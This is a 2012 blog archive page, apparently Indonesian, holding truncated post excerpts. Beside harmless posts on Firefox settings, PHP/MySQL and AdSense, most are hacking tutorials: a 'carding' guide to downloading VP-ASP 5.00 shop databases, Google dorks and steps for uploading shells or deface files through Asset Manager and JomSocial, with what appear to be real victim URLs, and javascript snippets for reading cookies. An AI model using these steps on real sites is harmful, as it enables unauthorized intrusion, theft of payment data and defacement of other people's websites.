Postingan

Menampilkan postingan dari Juni, 2012

bandwiht stole through mozilla

There are many ways to outsmart a slow Internet connection, especially since you use the internet access in the cafe-cafe that most of them have limited bandwidth of every computer. Here are some tips and tricks you can try: 1). Open the Mozilla Firefox Browser 2). In the Address Bar Type: ABOUT: CONFIG 3). Find the string below: (make sure all srting under the "TRUE") menggantingnya example: Network.http.pipelining FALSE ==> right click and select "Toggle" Network.http.pipelining TRUE Network.http.pipelining.maxrequests 64 Network.http.proxy.pipelining TRUE NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== this should be False 4). create a new srting how: Click the Left 1X Anywhere, Right click NEW >> INTEGER 5). Type: 0 Rate nglayout.initialpaint.delay 6). Then REFRESH or F5 7). In the Address Bar Type: ABOUT: BLANK Click the Menu: For OS Windows XP TOOLS >> OPTIONS >> WEB FEATURES For Linux OS (Vector) EDIT >> PREFERENCES For differen...

TuTorial Carding VP-ASP Shopping Cart Versi: 5.00

et's get started: Type: VP-ASP Shopping Cart Version: 5.00 How to find a VP-ASP 5.00 site? VP-ASP 5.00 Finding a site is very simple? A. Go to google.com and type in: VP-ASP Shopping Cart 5.00 2. You will find many sites with VP-ASP cart software installed 5.00 Now let's go to exploit .. Page will be like this: **** :/ / ***. victim.com / shop / shopdisplaycategories.asp Utilize are: diag_dbtest.asp Now you need to do this: **** :/ / ***. victim.com / shop / diag_dbtest.asp A page will appear with the people: xdatabase shopping140 xDblocation resx xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber Example: The most important thing here is xdatabase xdatabase: shopping140 Ok, now the URL will be like this: **** :/ / ***. victim.com/shop/shopping140.mdb ? If you do not download t Database, try this while there dblocation: xDblocation resx url will be: **** :/ / ***. victim.com/shop/resx/shopping140.mdb If u see an error message that you should try ...

Penerapan koneksi PHP ke Databash

Telah dijelaskan bahwa koneksi ke database merupakan salah satu fitur PHP yang paling sering digunakan. Apalagi PHP juga telah menyediakan fungsi-fungsi built in yang mendukung koneksi database ke MySQL server. Nah, setelah Anda sedikit banyak tahu tentang MySQL, kini saatnya untuk menerapkan pengetahuan tersebut untuk membuat aplikasi web database dengan PHP dan MySQL. Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut: mysql> create database datakontak; Pilihlah database tersebut sebagai database aktif. mysql> use datakontak; Buatlah sebuah tabel baru dengan nama tbl_kontak sebagai berikut: mysql> create table tbl_kontak( -> nama varchar(20), -> alamat varchar(30), -> telpon varchar(12), -> email varchar(30), -> tgl_lahir (date); Tabel ini adalah contoh suatu tabel daftar nama kontak. Isikan tabel tersebut dengan data-data yang ...

PengerTian Google Adsense . dan Cara Register Google Adsense Melaui BlogSpot .

Gambar
AdSense adalah program kerjasama periklanan melalui media Internet yang diselenggarakan oleh Google. Melalui program periklanan AdSense, pemilik situs web atau blog yang telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit iklan yang bentuk dan materinya telah ditentukan oleh Google di halaman web mereka. Pemilik situs web atau blog akan mendapatkan pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik. Selain menyediakan iklan-iklan dengan sistem bayar per klik, Google AdSense juga menyediakan AdSense untuk pencarian ( AdSense for Search ) dan iklan arahan ( Referral ). Pada AdSense untuk pencarian, pemilik situs web dapat memasang kotak pencarian Google di halaman web mereka. Pemilik situs akan mendapatkan pemasukan dari Google untuk setiap pencarian yang dilakukan pengunjung melalui kotak pencarian tersebut, y...

Remote File Inclusion

Gambar
Mungkin bagi sebagian teman-teman bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian teman-teman yang biasa bergelut dengan komputer security pasti telah sering mendengar apa yang disebut dengan Remote File Inclusion atau biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk serangan secara remote yang memanfaatkan kelemahan script pada suatu halaman website karena tidak tersanitasi dengan baik, dengan cara menyisipkan script lain untuk exploitasi, Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini. MENGAPA BISA TERJADI? ———————- Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan ...

Asset Manager :Shell and Files upload Vulnerability

Asset Manager :Shell and Files upload Vulnerability Google Dork :  "inurl:Editor/assetmanager/assetmanager.asp" Open Google.com/ncr and enetr this dork  "inurl:Editor/assetmanager/assetmanager.asp" Now Open any site from search results  Now You will Got a Page Like That             New Folder    Del Folder Upload File :    and site url will be like site.com/Editor/assetmanager/assetmanager.asp Change The Flash into all Files and Now choose Your File and Upload and acess Your file here site.com/Editor/assets/yourfilehere Special : How To upload a cool deface ;) Go; to  http://www.flashvortex.com/  and choose a cool design .. Now put your text and download it ..  rename the file After Downloading and upload it :) Demo -  http://www.1bakersfield.com//Editor/assets/devilscafe.swf http://www.1bakersfield.com/Editor/assets/devilscafe2....

Javascript Killer Javascript Injection : Fun with Javascripts

Gambar
javascript Injection is Similar to CSRF vulnerability  , its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection, Take a Look of javascript injection [Note : working in Firefox Only] Alert and Changing Title on Website  Javascript: alert(document.title = "title name"); You can Chnage Title of website by putting this script in you browser and you'll get a Alert too .. Message On website on alert Box  Javascript: alert("you message here"); use this script for more than one message javascript: alert("First message"); alert("second message"); alert("Third message"); you can show you message on website by putting this script on browser URL box Getting Cookies By javascripts you can use these scripts to get and chnage cookies of website alert(document.cookie); javascript:void( document .cookie="Cookie_name=Cookie_value"); javascript:void( document .cookie=...

JomSocial ~ Joomla Shell Upload Vulnerability

Gambar
Stuff you need: Firefox A Shell Tamper Data Vulnerable Site & a Brain :) Preparation : 1. Get a shell here. (recommend: c99.php) 2. Download Tamper Data 3. Find a vuln site. *refer to Dorking* Dorks: inurl:/com_community/ inurl:/images/originalvideos/ inurl:/index.php?option=com_community&view=videos Preparing your Shell: 1. Download a shell. 2. Put it in a folder (ex. "myshell") 3. Copy the shell to the same folder and rename it to "yourshell.php.flv" 4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv". Getting Access to site: 1. Register a fake account. 2. Active your fake account. 3. Go to your profile page. 4. Click on Add Video. 5. Choose upload video from computer. Uploading your Shell: Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln. The reason for having created a file called "myshell.php....